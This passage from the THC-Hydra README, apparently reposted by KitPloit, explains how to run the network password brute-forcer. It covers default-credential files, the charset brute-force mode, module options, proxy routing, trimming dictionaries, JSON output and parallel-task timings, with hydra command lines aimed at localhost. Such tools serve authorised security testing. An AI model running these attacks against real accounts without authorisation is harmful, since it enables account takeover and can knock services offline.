the login and try it as passwordIf you want to, e.g. try "try login as password and "empty password", you specify "-e sn" on the command line.But there are two more modes for trying passwords than -p/-P: You can use text file which where a login and password pair is separated by a colon, e.g.:admin:passwordtest:testfoo:barThis is a common default account style listing, that is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option – note that in this mode you can not use -l/-L/-p/-P options (-e nsr however you can). Example:hydra -C default_accounts.txt ftp://localhost/And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C):-x minimum_length:maximum_length:charsetthe charset definition is a for lowercase letters, A for uppercase letters, 1 for numbers and for anything else you supply it is their real representation. Examples:-x 1:3:a generate passwords from length 1 to 3 with all lowercase letters-x 2:5:/ generate passwords from length 2 to 5 containing only slashes-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbersExample:hydra -l ftp -x 3:3:a ftp://localhost/SPECIAL OPTIONS FOR MODULESVia the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it!To see the special option of a module, type:hydra -U e.g../hydra -U http-post-formThe special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format.Examples (they are all equal):./hydra -l test -p test -m PLAIN 127.0.0.1 imap./hydra -l test -p test 127.0.0.1 imap PLAIN./hydra -l test -p test imap://127.0.0.1/PLAINRESTORING AN ABORTED/CRASHED SESSIONWhen hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes. NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX)HOW TO SCAN/CRACK OVER A PROXYThe environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid:HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"HYDRA_PROXY_HTTP="proxylist.txt"The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax. eg:HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_portfor example:HYDRA_PROXY=connect://proxy.anonymizer.com:8000HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080HYDRA_PROXY=socksproxylist.txtADDITIONAL HINTSsort your password files by likelihood and use the -u option to find passwords much faster!uniq your dictionary files! this can save you a lot of time ūüôā cat words.txt | sort | uniq > dictionary.txtif you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing a least one letter and one number, etc. use the tool pw-inspector which comes along with the hydra package to reduce the password list: cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txtRESULTS OUTPUTThe results are output to stdio along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:text – plain text formatjsonv1 – JSON data using version 1.x of the schema (defined below).json – JSON data using the latest version of the schema, currently there is only version 1.If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.JSON SchemaHere is an example of the JSON output. Notes on some of the fields:errormessages – an array of zero or more strings that are normally printed to stderr at the end of the Hydra’s run. The text is very free form.success – indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion.quantityfound – How many username+password combinations discovered.jsonoutputversion – Version of the schema, 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make second tuple of the version to always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.Version 1.00 example:{ "errormessages": [ "[ERROR] Error Message of Something", "[ERROR] Another Message", "These are very free form" ], "generator": { "built": "2019-03-01 14:44:22", "commandline": "hydra -b jsonv1 -o results.json … …", "jsonoutputversion": "1.00", "server": "127.0.0.1", "service": "http-post-form", "software": "Hydra", "version": "v8.5" }, "quantityfound": 2, "results": [ { "host": "127.0.0.1", "login": "bill@example.com", "password": "bill", "port": 9999, "service": "http-post-form" }, { "host": "127.0.0.1", "login": "joe@example.com", "password": "joe", "port": 9999, "service": "http-post-form" } ], "success": false}SPEEDthrough the parallelizing feature, this password cracker tool can be very fast, however it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher – the faster ūüėČ (but too high – and it disables the service)STATISTICSRun against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down. P A R A L L E L T A S K SSERVICE 1 4 8 16 32 50 64 100 128——- ——————————————————————–telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55*ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21(*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown…guesses per task (rounded up):295 74 38 19 10 6 5 3 3guesses possible per connect (depends on the server software and config):telnet 4 ftp 6 pop3 1 imap 3Download Thc-Hydra

Link: http://www.kitploit.com/2019/05/hydra-90-fast-and-flexible-network.html